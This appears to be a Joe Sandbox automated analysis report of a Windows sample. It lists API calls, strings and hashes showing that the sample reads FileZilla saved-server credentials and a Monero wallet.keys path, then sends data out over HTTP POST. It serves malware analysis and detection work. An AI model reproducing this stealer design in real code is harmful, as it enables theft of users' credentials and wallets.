GetProcAddress.KERNEL32(75FD0000,01556300), ref: 008AA13B
GetProcAddress.KERNEL32(6FD30000,0155B220), ref: 008AA160
GetProcAddress.KERNEL32(6FD30000,01556480), ref: 008AA179
GetProcAddress.KERNEL32(6FD30000,0155AF78), ref: 008AA191
GetProcAddress.KERNEL32(6FD30000,0156CEB0), ref: 008AA1A9
GetProcAddress.KERNEL32(6FD30000,0156CE80), ref: 008AA1C2
GetProcAddress.KERNEL32(6FD30000,015564C0), ref: 008AA1DA
GetProcAddress.KERNEL32(6FD30000,01556520), ref: 008AA1F2
GetProcAddress.KERNEL32(6FD30000,0156CF40), ref: 008AA20B
GetProcAddress.KERNEL32(763B0000,015564E0), ref: 008AA22C
GetProcAddress.KERNEL32(763B0000,01556380), ref: 008AA244
GetProcAddress.KERNEL32(763B0000,0156CF58), ref: 008AA25D
GetProcAddress.KERNEL32(763B0000,0156CF28), ref: 008AA275
GetProcAddress.KERNEL32(763B0000,01556660), ref: 008AA28D
GetProcAddress.KERNEL32(750F0000,0155AFC8), ref: 008AA2B3
GetProcAddress.KERNEL32(750F0000,0155B248), ref: 008AA2CB
GetProcAddress.KERNEL32(750F0000,0156CDF0), ref: 008AA2E3
GetProcAddress.KERNEL32(750F0000,01556400), ref: 008AA2FC
GetProcAddress.KERNEL32(750F0000,015562E0), ref: 008AA314
GetProcAddress.KERNEL32(750F0000,0155B180), ref: 008AA32C
GetProcAddress.KERNEL32(75A50000,0156CE08), ref: 008AA352
GetProcAddress.KERNEL32(75A50000,015565E0), ref: 008AA36A
GetProcAddress.KERNEL32(75A50000,015687F0), ref: 008AA382
GetProcAddress.KERNEL32(75A50000,0156CFA0), ref: 008AA39B
GetProcAddress.KERNEL32(75A50000,0156CE38), ref: 008AA3B3
GetProcAddress.KERNEL32(75A50000,01556420), ref: 008AA3CB
GetProcAddress.KERNEL32(75A50000,01556320), ref: 008AA3E4
GetProcAddress.KERNEL32(75A50000,0156CE20), ref: 008AA3FC
GetProcAddress.KERNEL32(75A50000,0156CE50), ref: 008AA414
GetProcAddress.KERNEL32(75070000,015565A0), ref: 008AA436
GetProcAddress.KERNEL32(75070000,0156CE68), ref: 008AA44E
GetProcAddress.KERNEL32(75070000,0156CEE0), ref: 008AA466
GetProcAddress.KERNEL32(75070000,0156CF10), ref: 008AA47F
GetProcAddress.KERNEL32(75070000,0156CF70), ref: 008AA497
GetProcAddress.KERNEL32(74E50000,015563A0), ref: 008AA4B8
GetProcAddress.KERNEL32(74E50000,015564A0), ref: 008AA4D1
GetProcAddress.KERNEL32(75320000,015563C0), ref: 008AA4F2
GetProcAddress.KERNEL32(75320000,0156C9E8), ref: 008AA50A
GetProcAddress.KERNEL32(6F060000,015563E0), ref: 008AA530
GetProcAddress.KERNEL32(6F060000,015562C0), ref: 008AA548
GetProcAddress.KERNEL32(6F060000,01556540), ref: 008AA560
GetProcAddress.KERNEL32(6F060000,0156C898), ref: 008AA579
GetProcAddress.KERNEL32(6F060000,01556340), ref: 008AA591
GetProcAddress.KERNEL32(6F060000,01556560), ref: 008AA5A9
GetProcAddress.KERNEL32(6F060000,01556360), ref: 008AA5C2
GetProcAddress.KERNEL32(6F060000,01556580), ref: 008AA5DA
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 008AA5F1
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 008AA607
GetProcAddress.KERNEL32(74E00000,0156C8E0), ref: 008AA629
GetProcAddress.KERNEL32(74E00000,01568970), ref: 008AA641
GetProcAddress.KERNEL32(74E00000,0156CA00), ref: 008AA659
GetProcAddress.KERNEL32(74E00000,0156C880), ref: 008AA672
GetProcAddress.KERNEL32(74DF0000,015565C0), ref: 008AA693
GetProcAddress.KERNEL32(6F9A0000,0156CA30), ref: 008AA6B4
GetProcAddress.KERNEL32(6F9A0000,01556600), ref: 008AA6CD
GetProcAddress.KERNEL32(6F9A0000,0156C8B0), ref: 008AA6E5
GetProcAddress.KERNEL32(6F9A0000,0156CA18), ref: 008AA6FD

Strings

HttpQueryInfoA, xrefs: 008AA5FC
InternetSetOptionA, xrefs: 008AA5E5

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: f338900a5ef6565c67e3aa9a1ad9f5651a519cbfe3dd3c5f40a216dc866c909e
Instruction ID: 7cd6284f1c8534f4e04627c32a860670a6d8488dd2311c282b26f7e70a06998c
Opcode Fuzzy Hash: f338900a5ef6565c67e3aa9a1ad9f5651a519cbfe3dd3c5f40a216dc866c909e
Instruction Fuzzy Hash: 95623BBA602241AFC744DFE8ED8899A37F9F76C701714851BAA0BC3264D7399943DF12

Function 00897710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00897724
RtlAllocateHeap.NTDLL(00000000), ref: 0089772B
lstrcat.KERNEL32(?,015694C8), ref: 008978DB
lstrcat.KERNEL32(?,?), ref: 008978EF
lstrcat.KERNEL32(?,?), ref: 00897903
lstrcat.KERNEL32(?,?), ref: 00897917
lstrcat.KERNEL32(?,0156DA10), ref: 0089792B
lstrcat.KERNEL32(?,0156DA70), ref: 0089793F
lstrcat.KERNEL32(?,0156DAB8), ref: 00897952
lstrcat.KERNEL32(?,0156DA88), ref: 00897966
lstrcat.KERNEL32(?,0156DFD8), ref: 0089797A
lstrcat.KERNEL32(?,?), ref: 0089798E
lstrcat.KERNEL32(?,?), ref: 008979A2
lstrcat.KERNEL32(?,?), ref: 008979B6
lstrcat.KERNEL32(?,0156DA10), ref: 008979C9
lstrcat.KERNEL32(?,0156DA70), ref: 008979DD
lstrcat.KERNEL32(?,0156DAB8), ref: 008979F1
lstrcat.KERNEL32(?,0156DA88), ref: 00897A04
lstrcat.KERNEL32(?,0156E040), ref: 00897A18
lstrcat.KERNEL32(?,?), ref: 00897A2C
lstrcat.KERNEL32(?,?), ref: 00897A40
lstrcat.KERNEL32(?,?), ref: 00897A54
lstrcat.KERNEL32(?,0156DA10), ref: 00897A68
lstrcat.KERNEL32(?,0156DA70), ref: 00897A7B
lstrcat.KERNEL32(?,0156DAB8), ref: 00897A8F
lstrcat.KERNEL32(?,0156DA88), ref: 00897AA3
lstrcat.KERNEL32(?,0156E0A8), ref: 00897AB6
lstrcat.KERNEL32(?,?), ref: 00897ACA
lstrcat.KERNEL32(?,?), ref: 00897ADE
lstrcat.KERNEL32(?,?), ref: 00897AF2
lstrcat.KERNEL32(?,0156DA10), ref: 00897B06
lstrcat.KERNEL32(?,0156DA70), ref: 00897B1A
lstrcat.KERNEL32(?,0156DAB8), ref: 00897B2D
lstrcat.KERNEL32(?,0156DA88), ref: 00897B41
lstrcat.KERNEL32(?,0156E110), ref: 00897B55
lstrcat.KERNEL32(?,?), ref: 00897B69
lstrcat.KERNEL32(?,?), ref: 00897B7D
lstrcat.KERNEL32(?,?), ref: 00897B91
lstrcat.KERNEL32(?,0156DA10), ref: 00897BA4
lstrcat.KERNEL32(?,0156DA70), ref: 00897BB8
lstrcat.KERNEL32(?,0156DAB8), ref: 00897BCC
lstrcat.KERNEL32(?,0156DA88), ref: 00897BDF
lstrcat.KERNEL32(?,0156E178), ref: 00897BF3
lstrcat.KERNEL32(?,?), ref: 00897C07
lstrcat.KERNEL32(?,?), ref: 00897C1B
lstrcat.KERNEL32(?,?), ref: 00897C2F
lstrcat.KERNEL32(?,0156DA10), ref: 00897C43
lstrcat.KERNEL32(?,0156DA70), ref: 00897C56
lstrcat.KERNEL32(?,0156DAB8), ref: 00897C6A
lstrcat.KERNEL32(?,0156DA88), ref: 00897C7E

Part of subcall function 008975D0: lstrcat.KERNEL32(35CE6020,008B17FC), ref: 00897606
Part of subcall function 008975D0: lstrcat.KERNEL32(35CE6020,00000000), ref: 00897648
Part of subcall function 008975D0: lstrcat.KERNEL32(35CE6020, : ), ref: 0089765A
Part of subcall function 008975D0: lstrcat.KERNEL32(35CE6020,00000000), ref: 0089768F
Part of subcall function 008975D0: lstrcat.KERNEL32(35CE6020,008B1804), ref: 008976A0
Part of subcall function 008975D0: lstrcat.KERNEL32(35CE6020,00000000), ref: 008976D3
Part of subcall function 008975D0: lstrcat.KERNEL32(35CE6020,008B1808), ref: 008976ED
Part of subcall function 008975D0: task.LIBCPMTD ref: 008976FB

lstrcat.KERNEL32(?,0156E590), ref: 00897E0B
lstrcat.KERNEL32(?,0156D438), ref: 00897E1E
lstrlen.KERNEL32(35CE6020), ref: 00897E2B
lstrlen.KERNEL32(35CE6020), ref: 00897E3B

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 5f93e7a783a02f905ac2d18c6027a28e5b8bb6992304a0a4b66a3d74f0755784
Instruction ID: b3f50ad1a2e87e1bac50955368be1520b97456504aea3fcbedb8d2ac854670b3
Opcode Fuzzy Hash: 5f93e7a783a02f905ac2d18c6027a28e5b8bb6992304a0a4b66a3d74f0755784
Instruction Fuzzy Hash: 59323EB2C10354ABDB11EBE0DC85DEE777CBB54700F044699F21AA2490EA74E786CF62

Function 008A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

GetProcessHeap.KERNEL32(00000000,000F423F,008B0DBA,008B0DB7,008B0DB6,008B0DB3), ref: 008A0362
RtlAllocateHeap.NTDLL(00000000), ref: 008A0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 008A0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 008A03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 008A0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008A0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 008A0562
lstrcat.KERNEL32(?,profile: null), ref: 008A0571
lstrcat.KERNEL32(?,url: ), ref: 008A0580
lstrcat.KERNEL32(?,00000000), ref: 008A0593
lstrcat.KERNEL32(?,008B1678), ref: 008A05A2
lstrcat.KERNEL32(?,00000000), ref: 008A05B5
lstrcat.KERNEL32(?,008B167C), ref: 008A05C4
lstrcat.KERNEL32(?,login: ), ref: 008A05D3
lstrcat.KERNEL32(?,00000000), ref: 008A05E6
lstrcat.KERNEL32(?,008B1688), ref: 008A05F5
lstrcat.KERNEL32(?,password: ), ref: 008A0604
lstrcat.KERNEL32(?,00000000), ref: 008A0617
lstrcat.KERNEL32(?,008B1698), ref: 008A0626
lstrcat.KERNEL32(?,008B169C), ref: 008A0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,008B0DB2), ref: 008A068E

Strings

<Pass encoding="base64">, xrefs: 008A045A
password: , xrefs: 008A05FB
login: , xrefs: 008A05CA
<Host>, xrefs: 008A037C
profile: null, xrefs: 008A0568
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 008A02A4
browser: FileZilla, xrefs: 008A0559
<User>, xrefs: 008A0410
url: , xrefs: 008A0577
<Port>, xrefs: 008A03C6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: e249ee75a529bdc510cb7edc1d0e9c5ac9c546cf7eb9aa0c0ee541f08b1997fc
Instruction ID: df589784136fa22a4028b27488d476d5c24ab5bcc2633c9c5d485949d8bbacd3
Opcode Fuzzy Hash: e249ee75a529bdc510cb7edc1d0e9c5ac9c546cf7eb9aa0c0ee541f08b1997fc
Instruction Fuzzy Hash: F2D12D719001089BDB48EBE8DD96EEE7778FF25300F544519F503E6991EF38AA06CB62

Function 00895100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

lstrlen.KERNEL32(00000000), ref: 00895193

Part of subcall function 008A8EA0: CryptBinaryToStringA.CRYPT32(00000000,00895184,40000001,00000000,00000000,?,00895184), ref: 008A8EC0

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00895207
StrCmpCA.SHLWAPI(?,0156E4F0), ref: 00895225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00895340
HttpOpenRequestA.WININET(00000000,0156E510,?,0156DC98,00000000,00000000,00400100,00000000), ref: 008953A4

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0156E4D0,00000000,?,01569F18,00000000,?,008B19DC,00000000,?,008A51CF), ref: 00895737
lstrlen.KERNEL32(00000000), ref: 0089574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0089575C
RtlAllocateHeap.NTDLL(00000000), ref: 00895763
lstrlen.KERNEL32(00000000), ref: 00895778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008957A9
lstrlen.KERNEL32(00000000), ref: 008957C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008957E1
lstrlen.KERNEL32(00000000,?,?), ref: 0089580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00895822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0089584D
InternetCloseHandle.WININET(00000000), ref: 008958B1
InternetCloseHandle.WININET(00000000), ref: 008958BE
InternetCloseHandle.WININET(00000000), ref: 008958C8

Strings

------, xrefs: 008954F9
------, xrefs: 0089563B
", xrefs: 00895706
--, xrefs: 00895280
------, xrefs: 00895297
------, xrefs: 008953B7
", xrefs: 00895482
", xrefs: 008955C4

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 459dc81f029e502163bc04396ef74124c538c7946f65b9be025ab1cda7e81f81
Instruction ID: c7c7daf2f59033481b7b33b91b0d1859e748f0736f68382f91e4ee615de2a16c
Opcode Fuzzy Hash: 459dc81f029e502163bc04396ef74124c538c7946f65b9be025ab1cda7e81f81
Instruction Fuzzy Hash: F0324171920118AAEB58EBA4DC95FEEB378FF15700F404169B117E2991EF342A49CF63

Function 0089A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AAA70: StrCmpCA.SHLWAPI(015689E0,0089A7A7,?,0089A7A7,015689E0), ref: 008AAA8F

